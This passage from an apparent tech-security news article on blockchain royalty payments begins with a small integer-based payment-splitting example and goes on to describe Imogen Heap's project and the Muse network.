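shares = {"writer": 50, "vocalist": 30, "sampler": 20}
print(split_payment(1_000_003, shares))
# → {'writer': 500003, 'vocalist': 300000, 'sampler': 200000}
```

The integer arithmetic matters: on-chain currencies deal in indivisible base units (wei, in Ethereum’s case), so the split has to account for every unit rather than rely on floating point.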

Heap’s isn’t the only project along these lines. Muse is another blockchain-based project seeking artists to register on its network. It targets artists, and offers its information to streaming platforms, giving them the option to pay artists through its network using its internal currency, called Muse Dollars. Like Heap’s project, it’s still in the early stages.

That has little to do with transactional security or anonymity as such, but it does promote a different kind of security that seems to be central to the way that blockchains work: it maintains transparency, and keeps people honest.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Za44K89VDm8/